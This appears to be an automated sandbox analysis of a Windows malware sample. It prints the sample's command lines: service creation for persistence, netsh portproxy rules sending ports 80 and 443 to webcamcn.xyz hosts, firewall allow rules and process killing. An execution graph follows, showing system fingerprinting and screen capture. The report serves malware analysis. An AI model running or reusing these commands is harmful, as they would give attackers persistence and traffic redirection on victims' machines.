                                      Commandline:powershell.exe cscript C:\Users\user\99944\144977.vbs
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:12:53:32
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144
                                      Imagebase:0x7ff664e80000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:12:53:33
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:12:53:33
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:12:53:34
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:12:53:34
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:12:53:35
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:12:53:35
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:12:53:36
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /f /t /im wegame.exe
                                      Imagebase:0x7ff6aa9b0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:12:53:36
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /f /t /im WeGame.exe
                                      Imagebase:0x7ff6aa9b0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:15.8%
                                        Dynamic/Decrypted Code Coverage:97.2%
                                        Signature Coverage:18.2%
                                        Total number of Nodes:1569
                                        Total number of Limit Nodes:47
11717->11718 11718->11712 11720 3f41f45 11719->11720 11720->11282 11722 3f4123e 11721->11722 11723 3f4124a RaiseException 11721->11723 11722->11723 11723->11291 11734 3f49383 11724->11734 11726 3f41eef 11727 3f41f0a __NMSG_WRITE __NMSG_WRITE 11726->11727 11729 3f49383 __FF_MSGBANNER 12 API calls 11726->11729 11728 3f3f691 __NMSG_WRITE 11727->11728 11731 3f41a78 11728->11731 11730 3f41efc 11729->11730 11730->11727 11730->11728 11741 3f41a4d GetModuleHandleW 11731->11741 11735 3f4938f 11734->11735 11736 3f3f91b __controlfp_s __getptd_noexit 11735->11736 11737 3f49399 11735->11737 11738 3f493b2 11736->11738 11737->11726 11739 3f420e2 __controlfp_s 11 API calls 11738->11739 11740 3f493bd 11739->11740 11740->11726 11742 3f41a71 ExitProcess 11741->11742 11743 3f41a61 GetProcAddress 11741->11743 11743->11742 11745 3f3cd31 11744->11745 11746 3f3cd27 11744->11746 11748 3f39800 InitializeCriticalSectionAndSpinCount 11745->11748 11749 3f3f639 _free 3 API calls 11745->11749 11747 3f31280 2 API calls 11746->11747 11747->11745 11748->11298 11748->11299 11749->11748 11751 3f41215 __CxxThrowException@8 RaiseException 11750->11751 11752 3f31295 DeleteCriticalSection 11751->11752 11752->11293 11757 3f3d3d0 11754->11757 11758 3f3d3e6 _vwprintf 11757->11758 11759 3f3d3dc 11757->11759 11758->11759 11760 3f31280 2 API calls 11759->11760 11761 3f31280 2 API calls 11759->11761 11764 3f3d3c0 11759->11764 11765 3f3d160 11759->11765 11770 3f407a7 11759->11770 11760->11758 11761->11759 11764->11350 11766 3f3d16f 11765->11766 11769 3f3d181 11766->11769 11773 3f3d260 11766->11773 11769->11759 11786 3f4072e 11770->11786 11772 3f407bf 11772->11759 11774 3f3d27b 11773->11774 11777 3f407f2 11774->11777 11776 3f3d17e 11776->11759 11781 3f407ff 11777->11781 11782 3f40803 _memset 11777->11782 11778 3f40809 11779 3f3f91b __controlfp_s __getptd_noexit 11778->11779 11780 3f4080e 11779->11780 11783 3f420e2 __controlfp_s 11 API calls 11780->11783 11781->11776 11782->11778 11782->11781 11784 3f4084e 
11782->11784 11783->11781 11784->11781 11785 3f3f91b __controlfp_s __getptd_noexit 11784->11785 11785->11780 11787 3f4074e 11786->11787 11788 3f40739 11786->11788 11790 3f4075c 11787->11790 11793 3f40769 __vswprintf_helper 11787->11793 11789 3f3f91b __controlfp_s __getptd_noexit 11788->11789 11792 3f4073e 11789->11792 11791 3f3f91b __controlfp_s __getptd_noexit 11790->11791 11796 3f40761 11791->11796 11795 3f420e2 __controlfp_s 11 API calls 11792->11795 11794 3f40787 11793->11794 11797 3f407a1 11794->11797 11799 3f3f91b __controlfp_s __getptd_noexit 11794->11799 11798 3f40749 11795->11798 11800 3f420e2 __controlfp_s 11 API calls 11796->11800 11797->11772 11798->11772 11799->11796 11800->11797 11802 3f35611 GetSystemInfo wsprintfW 11801->11802 11803 3f374ac GetProcAddress 11801->11803 11814 3f36c50 11802->11814 11804 3f374c0 11803->11804 11805 3f37597 FreeLibrary 11803->11805 11925 3f3f858 11804->11925 11805->11802 11807 3f374f4 11928 3f37410 GetModuleHandleW GetProcAddress 11807->11928 11811 3f37582 RegCloseKey 11813 3f37592 11811->11813 11812 3f3756d 11812->11811 11813->11805 11815 3f36c73 GetDriveTypeW 11814->11815 11816 3f36cd0 11815->11816 11817 3f36c96 GetDiskFreeSpaceExW 11815->11817 11816->11815 11818 3f36cd6 _memset 11816->11818 11817->11816 11819 3f36ce6 GlobalMemoryStatusEx 11818->11819 11820 3f3f858 swprintf 13 API calls 11819->11820 11821 3f36d3e 11820->11821 11822 3f3f858 swprintf 13 API calls 11821->11822 11823 3f36d51 11822->11823 11824 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11823->11824 11825 3f3567d 11824->11825 11826 3f36ee0 CreateDXGIFactory 11825->11826 11829 3f373cb moneypunct _memmove 11826->11829 11831 3f36f58 moneypunct _memmove 11826->11831 11827 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11828 3f35692 GetForegroundWindow 11827->11828 11828->11369 11828->11370 11829->11827 11831->11829 11832 3f3f858 13 API 
calls swprintf 11831->11832 11932 3f3ef39 std::exception::exception 11831->11932 11832->11831 11935 3f3eff4 11833->11935 11835 3f36a8f GetCurrentProcessId wsprintfW 11836 3f36910 53 API calls 11835->11836 11837 3f36ab3 _memset 11836->11837 11838 3f36ac7 GetVersionExW 11837->11838 11839 3f36be6 11838->11839 11840 3f36ae9 11838->11840 11841 3f36c14 wsprintfW 11839->11841 11840->11839 11842 3f36b03 GetCurrentProcess OpenProcessToken 11840->11842 11843 3f36c24 11841->11843 11842->11839 11844 3f36b27 GetTokenInformation 11842->11844 11847 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11843->11847 11845 3f36bbb CloseHandle 11844->11845 11846 3f36b49 GetLastError 11844->11846 11849 3f36bd0 11845->11849 11846->11845 11848 3f36b54 LocalAlloc 11846->11848 11850 3f35812 GetCurrentProcessId 11847->11850 11848->11845 11851 3f36b6d GetTokenInformation 11848->11851 11849->11839 11849->11841 11849->11843 11850->11392 11850->11393 11852 3f36b8f GetSidSubAuthorityCount GetSidSubAuthority 11851->11852 11853 3f36bae LocalFree 11851->11853 11852->11853 11853->11845 11855 3f366bc 11854->11855 11857 3f366c4 11854->11857 11855->11396 11856 3f3677d CoUninitialize 11856->11396 11857->11855 11857->11856 11858 3f36747 SysFreeString 11857->11858 11858->11857 11860 3f46770 _memset 11859->11860 11861 3f364c7 RegOpenKeyExW 11860->11861 11862 3f364f0 RegQueryInfoKeyW 11861->11862 11863 3f3662e lstrlenW 11861->11863 11864 3f36673 11862->11864 11875 3f36532 _memset 11862->11875 11863->11864 11868 3f36640 11863->11868 11865 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11864->11865 11867 3f3667f 11865->11867 11866 3f3662c 11866->11863 11867->11404 11869 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11868->11869 11870 3f3666f 11869->11870 11870->11404 11871 3f3661e RegCloseKey 11871->11866 11872 3f36593 
RegEnumKeyExW lstrlenW 11873 3f365ce lstrlenW 11872->11873 11872->11875 11873->11875 11874 3f400ab 12 API calls 11874->11875 11875->11866 11875->11871 11875->11872 11875->11874 11882 3f36190 _memset 11876->11882 11877 3f36201 CoCreateInstance 11878 3f36422 lstrlenW 11877->11878 11888 3f3622e _memset 11877->11888 11879 3f36441 11878->11879 11880 3f36431 lstrcatW 11878->11880 11883 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11879->11883 11880->11879 11882->11877 11885 3f361bb lstrcatW lstrcatW 11882->11885 11936 3f36050 11882->11936 11886 3f36477 11883->11886 11884 3f3640a 11884->11878 11885->11882 11886->11406 11887 3f362d3 wsprintfW RegOpenKeyExW 11887->11888 11888->11884 11888->11887 11889 3f3637b RegQueryValueExW 11888->11889 11890 3f363dc RegCloseKey 11889->11890 11891 3f363bc lstrcatW lstrcatW 11889->11891 11890->11888 11891->11890 11951 3f46952 __getptd_noexit 11892->11951 11894 3f403b3 11896 3f35934 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 11894->11896 11958 3f40120 11894->11958 11896->11410 11900 3f403dd 11897->11900 11901 3f403e4 11897->11901 11898 3f3f91b __controlfp_s __getptd_noexit 11899 3f403e9 11898->11899 11902 3f420e2 __controlfp_s 11 API calls 11899->11902 11900->11901 11904 3f40412 11900->11904 11901->11898 11903 3f354dd 11902->11903 11903->11362 11904->11903 11905 3f3f91b __controlfp_s __getptd_noexit 11904->11905 11905->11899 11907 3f3824f 11906->11907 11908 3f3811d 11906->11908 11910 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11907->11910 11908->11907 11909 3f38125 GetLogicalDriveStringsW 11908->11909 11911 3f38202 lstrcpyW 11909->11911 11912 3f38140 11909->11912 11913 3f3825d 11910->11913 11914 3f3820a 11911->11914 11912->11911 11916 3f38160 lstrcmpiW 11912->11916 11919 3f381f6 11912->11919 11913->11400 11915 3f3f00a 
__ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11914->11915 11917 3f38219 11915->11917 11916->11912 11918 3f38170 lstrcmpiW 11916->11918 11917->11400 11918->11912 11920 3f38180 QueryDosDeviceW 11918->11920 11919->11911 11920->11914 11921 3f381b0 lstrlenW __wcsnicmp 11920->11921 11921->11912 11922 3f3821d lstrcpyW lstrcatW 11921->11922 11923 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11922->11923 11924 3f3824b 11923->11924 11924->11400 11926 3f4072e swprintf 13 API calls 11925->11926 11927 3f3f871 11926->11927 11927->11807 11929 3f37456 GetSystemInfo 11928->11929 11930 3f3744e GetNativeSystemInfo 11928->11930 11931 3f37460 RegOpenKeyExW RegQueryValueExW 11929->11931 11930->11931 11931->11811 11931->11812 11933 3f41215 __CxxThrowException@8 RaiseException 11932->11933 11934 3f3ef68 std::exception::exception 11933->11934 11934->11831 11937 3f46770 _memset 11936->11937 11938 3f36081 CreateToolhelp32Snapshot 11937->11938 11939 3f360a6 Process32FirstW 11938->11939 11940 3f36095 11938->11940 11942 3f36115 CloseHandle 11939->11942 11946 3f360c3 11939->11946 11941 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11940->11941 11944 3f360a2 11941->11944 11943 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11942->11943 11945 3f3612a 11943->11945 11944->11882 11945->11882 11947 3f36107 Process32NextW 11946->11947 11948 3f3612e CloseHandle 11946->11948 11947->11942 11947->11946 11949 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11948->11949 11950 3f36147 11949->11950 11950->11882 11952 3f46960 11951->11952 11953 3f4696f 11951->11953 11954 3f3f91b __controlfp_s __getptd_noexit 11952->11954 11955 3f46984 11953->11955 11956 3f46975 __malloc_crt 11953->11956 11957 3f46965 
11954->11957 11955->11894 11956->11952 11956->11955 11957->11894 11959 3f4013c 11958->11959 11960 3f4014f _memset 11958->11960 11961 3f3f91b __controlfp_s __getptd_noexit 11959->11961 11963 3f40167 11960->11963 11973 3f40178 11960->11973 11962 3f40141 11961->11962 11964 3f420e2 __controlfp_s 11 API calls 11962->11964 11966 3f3f91b __controlfp_s __getptd_noexit 11963->11966 11965 3f4014b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 11964->11965 11965->11896 11967 3f4016c 11966->11967 11972 3f420e2 __controlfp_s 11 API calls 11967->11972 11968 3f40196 11970 3f3f91b __controlfp_s __getptd_noexit 11968->11970 11969 3f401a7 11993 3f46403 11969->11993 11970->11965 11972->11965 11973->11968 11973->11969 11974 3f401ac 11999 3f466cc 11974->11999 11976 3f401b5 11977 3f4039d 11976->11977 12006 3f466f9 11976->12006 11979 3f42090 __invoke_watson 10 API calls 11977->11979 11980 3f403a7 11979->11980 11982 3f46952 __localtime64 3 API calls 11980->11982 11981 3f401c7 11981->11977 12013 3f46726 11981->12013 11984 3f403b3 11982->11984 11987 3f403c2 11984->11987 11989 3f40120 __localtime64_s 38 API calls 11984->11989 11985 3f401d9 11985->11977 11986 3f401e2 11985->11986 11988 3f40255 __gmtime64_s 11986->11988 11990 3f401f5 __gmtime64_s 11986->11990 11987->11896 11988->11965 11989->11987 11990->11965 11991 3f40213 11990->11991 11991->11965 11992 3f4022b __gmtime64_s 11991->11992 11992->11965 11994 3f4640f ___BuildCatchObject 11993->11994 11995 3f46419 __lock 11994->11995 11998 3f46431 ___BuildCatchObject 11994->11998 11996 3f4642c 11995->11996 11995->11998 12020 3f45d22 11996->12020 11998->11974 12000 3f466ed 11999->12000 12001 3f466d8 11999->12001 12000->11976 12002 3f3f91b __controlfp_s __getptd_noexit 12001->12002 12003 3f466dd 12002->12003 12004 3f420e2 __controlfp_s 11 API calls 12003->12004 12005 3f466e8 12004->12005 12005->11976 12007 3f46705 12006->12007 12008 3f4671a 12006->12008 12009 3f3f91b __controlfp_s __getptd_noexit 12007->12009 12008->11981 12010 3f4670a 
12009->12010 12011 3f420e2 __controlfp_s 11 API calls 12010->12011 12012 3f46715 12011->12012 12012->11981 12014 3f46747 12013->12014 12015 3f46732 12013->12015 12014->11985 12016 3f3f91b __controlfp_s __getptd_noexit 12015->12016 12017 3f46737 12016->12017 12018 3f420e2 __controlfp_s 11 API calls 12017->12018 12019 3f46742 12018->12019 12019->11985 12048 3f44300 12020->12048 12022 3f45d2e __lock 12023 3f45d52 __tzset_nolock 12022->12023 12024 3f46726 __tzset_nolock 12 API calls 12023->12024 12025 3f45d5e 12024->12025 12027 3f466cc __tzset_nolock 12 API calls 12025->12027 12046 3f45e1b __tzset_nolock 12025->12046 12026 3f42090 __invoke_watson 10 API calls 12026->12046 12028 3f45d70 12027->12028 12031 3f466f9 __tzset_nolock 12 API calls 12028->12031 12028->12046 12029 3f45e46 GetTimeZoneInformation 12029->12046 12030 3f3f639 _free 3 API calls 12030->12046 12032 3f45d82 12031->12032 12032->12046 12049 3f4b118 __getptd 12032->12049 12034 3f45ead WideCharToMultiByte 12034->12046 12036 3f45ee5 WideCharToMultiByte 12036->12046 12038 3f45de9 _strlen 12040 3f45df0 __malloc_crt 12038->12040 12039 3f4a7e2 12 API calls __tzset_nolock 12039->12046 12042 3f45e06 _strlen 12040->12042 12040->12046 12041 3f46016 __tzset_nolock ___BuildCatchObject 12041->11998 12059 3f41928 12042->12059 12043 3f45db2 __tzset_nolock 12043->12038 12044 3f3f639 _free 3 API calls 12043->12044 12043->12046 12044->12038 12046->12026 12046->12029 12046->12030 12046->12034 12046->12036 12046->12039 12046->12041 12047 3f4b1d0 __wcstoi64 __tzset_nolock 12046->12047 12047->12046 12048->12022 12050 3f45d90 12049->12050 12051 3f4b12a 12049->12051 12053 3f4b1e6 12050->12053 12051->12050 12068 3f45006 12051->12068 12054 3f4b1ff 12053->12054 12055 3f4b1fb 12053->12055 12054->12055 12057 3f4b211 _strlen 12054->12057 12078 3f4c886 12054->12078 12055->12043 12057->12055 12088 3f4c86c 12057->12088 12060 3f41936 12059->12060 12061 3f4193d 12059->12061 12060->12061 12065 3f4195b 12060->12065 12062 3f3f91b __controlfp_s 
__getptd_noexit 12061->12062 12067 3f41942 12062->12067 12063 3f420e2 __controlfp_s 11 API calls 12064 3f4194c 12063->12064 12064->12046 12065->12064 12066 3f3f91b __controlfp_s __getptd_noexit 12065->12066 12066->12067 12067->12063 12069 3f44300 ___BuildCatchObject 12068->12069 12070 3f45012 __getptd 12069->12070 12071 3f45045 __lock 12070->12071 12072 3f45023 12070->12072 12074 3f44fb9 __updatetlocinfoEx_nolock ___addlocaleref ___removelocaleref ___freetlocinfo 12071->12074 12072->12071 12073 3f45029 __getptd 12072->12073 12075 3f45031 ____lc_codepage_func 12073->12075 12074->12075 12076 3f45035 __amsg_exit 12075->12076 12077 3f4503d ___BuildCatchObject 12075->12077 12076->12077 12077->12050 12079 3f4c8a1 12078->12079 12080 3f4c906 12078->12080 12079->12080 12081 3f4c8a7 WideCharToMultiByte 12079->12081 12087 3f3f639 _free RtlFreeHeap GetLastError __getptd_noexit 12079->12087 12080->12057 12081->12080 12082 3f4c8b9 __calloc_crt 12081->12082 12082->12080 12083 3f4c8ca WideCharToMultiByte 12082->12083 12084 3f4c912 12083->12084 12085 3f4c8dc ___crtsetenv 12083->12085 12086 3f3f639 _free RtlFreeHeap GetLastError __getptd_noexit 12084->12086 12085->12079 12086->12080 12087->12079 12089 3f4c78e __mbsnbicoll_l 15 API calls 12088->12089 12090 3f4c881 12089->12090 12090->12057 12648 3f503d3 12649 3f50381 __CallSettingFrame@12 12648->12649 12652 3f503e8 12649->12652 12654 3f4902e 12649->12654 12651 3f503fe ___BuildCatchObject 12652->12651 12653 3f4902e _GetRangeOfTrysToCheck 18 API calls 12652->12653 12653->12651 12660 3f44300 12654->12660 12656 3f4903a DecodePointer 12657 3f4904a 12656->12657 12661 3f48fe2 12657->12661 12660->12656 12667 3f44300 12661->12667 12663 3f48fee __getptd 12664 3f48ffa 12663->12664 12668 3f3f787 12664->12668 12667->12663 12675 3f42147 DecodePointer 12668->12675 12670 3f3f78c 12673 3f3f797 12670->12673 12676 3f42154 12670->12676 12672 3f3f7af 12673->12672 12674 3f41f67 __call_reportfault 8 API calls 12673->12674 12674->12672 12675->12670 12680 
3f42160 ___BuildCatchObject 12676->12680 12677 3f421bb 12678 3f4219d DecodePointer 12677->12678 12682 3f421ca 12677->12682 12686 3f421a9 _siglookup 12678->12686 12679 3f42187 __getptd_noexit 12679->12686 12689 3f42195 _raise ___BuildCatchObject 12679->12689 12680->12677 12680->12678 12680->12679 12684 3f42183 12680->12684 12683 3f3f91b __controlfp_s __getptd_noexit 12682->12683 12685 3f421cf 12683->12685 12684->12679 12684->12682 12688 3f420e2 __controlfp_s 11 API calls 12685->12688 12687 3f4222c __lock 12686->12687 12686->12689 12687->12689 12688->12689 12689->12673 12775 3f411cf 12778 3f442d9 12775->12778 12777 3f411dd 12779 3f442f5 12778->12779 12780 3f442e8 12778->12780 12779->12777 12783 3f4418f __getptd_noexit 12780->12783 12784 3f441a4 12783->12784 12784->12777 10979 401000 10984 401b90 GetProcessHeap 10979->10984 10983 40100a 10985 401005 10984->10985 10986 401b28 10985->10986 10987 401b30 10986->10987 10990 401010 10987->10990 10989 401b47 10989->10983 10997 401e90 CreateFileA 10990->10997 10994 401054 11006 4012c0 10994->11006 10998 401eb4 GetFileSize 10997->10998 10999 401034 10997->10999 11013 401d70 10998->11013 11002 40109e 10999->11002 11003 4010b1 11002->11003 11003->11003 11024 401244 GetProcessHeap 11003->11024 11005 4011a7 11005->10994 11007 4012f1 GetPEB 11006->11007 11008 40132c 11007->11008 11009 401633 VirtualAlloc 11008->11009 11010 401090 11008->11010 11012 401660 11009->11012 11010->10989 11011 4019be LoadLibraryA 11011->11010 11011->11012 11012->11010 11012->11011 11014 401d84 RtlAllocateHeap 11013->11014 11015 401d79 GetProcessHeap 11013->11015 11016 401db5 ReadFile FindCloseChangeNotification 11014->11016 11017 401d99 MessageBoxA 11014->11017 11015->11014 11016->10999 11020 401c00 11017->11020 11021 401c08 11020->11021 11022 401c11 ExitProcess 11021->11022 11023 401c1d 11021->11023 11023->11016 11027 40121d 11024->11027 11026 401274 RtlAllocateHeap 11026->11005 11027->11026 11039 25f811b HeapCreate 13928 3f362b6 13930 3f362c0 _memset 
13928->13930 13929 3f362d3 wsprintfW RegOpenKeyExW 13929->13930 13930->13929 13931 3f3637b RegQueryValueExW 13930->13931 13935 3f3640a lstrlenW 13930->13935 13932 3f363dc RegCloseKey 13931->13932 13933 3f363bc lstrcatW lstrcatW 13931->13933 13932->13930 13933->13932 13936 3f36441 13935->13936 13937 3f36431 lstrcatW 13935->13937 13938 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13936->13938 13937->13936 13939 3f36477 13938->13939 12964 3f41b90 12977 3f44300 12964->12977 12966 3f41b9c __lock 12967 3f41bb7 12966->12967 12970 3f41c4d 12966->12970 12968 3f41bce DecodePointer 12967->12968 12967->12970 12969 3f41be5 DecodePointer 12968->12969 12968->12970 12975 3f41bf8 12969->12975 12971 3f41cca ___BuildCatchObject 12970->12971 12972 3f41a78 _doexit 3 API calls 12970->12972 12973 3f41cbb 12972->12973 12974 3f41c0f DecodePointer 12974->12975 12975->12970 12975->12974 12976 3f41c1e DecodePointer DecodePointer 12975->12976 12976->12975 12977->12966 12997 3f3b19d 13005 3f3bc70 7 API calls 12997->13005 12999 3f3b1c1 13000 3f3f707 31 API calls 12999->13000 13002 3f3b235 12999->13002 13001 3f3b1d5 _memset 13000->13001 13003 3f3f858 swprintf 13 API calls 13001->13003 13004 3f3b209 moneypunct 13003->13004 13006 3f3bcf6 GetSystemMetrics 13005->13006 13015 3f3bce5 13005->13015 13008 3f3bd00 13006->13008 13009 3f3bd4b 13006->13009 13007 3f3bd76 GetSystemMetrics 13037 3f501c0 13007->13037 13013 3f3bd0e GetSystemMetrics 13008->13013 13011 3f3bd59 GetSystemMetrics 13009->13011 13011->13015 13013->13015 13014 3f501c0 13016 3f3bd9d CreateCompatibleBitmap SelectObject SetStretchBltMode GetSystemMetrics 13014->13016 13015->13007 13017 3f501c0 13016->13017 13018 3f3bddd GetSystemMetrics 13017->13018 13019 3f501c0 13018->13019 13020 3f3bdf0 StretchBlt 13019->13020 13021 3f3be70 _memset 13020->13021 13022 3f3be7f GetDIBits 13021->13022 13023 3f3bea3 _memset 13022->13023 13024 3f3f707 31 API calls 13023->13024 13025 3f3bef8 
13024->13025 13039 3f3c060 GlobalAlloc GlobalLock 13025->13039 13028 3f3bf1f DeleteObject DeleteObject ReleaseDC 13030 3f3bf45 moneypunct 13028->13030 13029 3f3bf99 13032 3f3bfd8 DeleteObject DeleteObject ReleaseDC 13029->13032 13031 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13030->13031 13033 3f3bf93 13031->13033 13034 3f3c001 moneypunct 13032->13034 13033->12999 13035 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13034->13035 13036 3f3c04c 13035->13036 13036->12999 13038 3f3bd88 GetSystemMetrics 13037->13038 13038->13014 13040 3f47660 13039->13040 13041 3f3c0bb GlobalUnlock CreateStreamOnHGlobal 13040->13041 13042 3f3c248 GlobalFree 13041->13042 13043 3f3c0df EnterCriticalSection LeaveCriticalSection 13041->13043 13045 3f3c19d 13042->13045 13063 3f39de0 13043->13063 13047 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13045->13047 13046 3f3c13a 13048 3f3c142 CreateStreamOnHGlobal 13046->13048 13062 3f3c232 13046->13062 13049 3f3bf1b 13047->13049 13050 3f3c156 13048->13050 13048->13062 13049->13028 13049->13029 13071 3f3a460 13050->13071 13052 3f39ba0 6 API calls 13052->13042 13054 3f3c183 GlobalFree 13102 3f39ba0 13054->13102 13055 3f3c1a4 GlobalSize 13058 3f3c1b6 13055->13058 13095 3f3d020 13058->13095 13060 3f3c1e2 moneypunct 13061 3f3c21d GlobalUnlock 13060->13061 13061->13062 13062->13052 13109 3f39ac0 13063->13109 13065 3f39dec 13066 3f39df0 GdipCreateBitmapFromStream 13065->13066 13067 3f39e1e 13065->13067 13068 3f39e17 GdipDisposeImage 13066->13068 13069 3f39e2a 13066->13069 13067->13046 13068->13067 13070 3f39e35 GdipDisposeImage 13069->13070 13070->13046 13072 3f39ac0 3 API calls 13071->13072 13073 3f3a47d 13072->13073 13074 3f3a485 GdipGetImageEncodersSize 13073->13074 13094 3f3a50f 13073->13094 13080 3f3a49b 13074->13080 13074->13094 13075 3f3f00a 
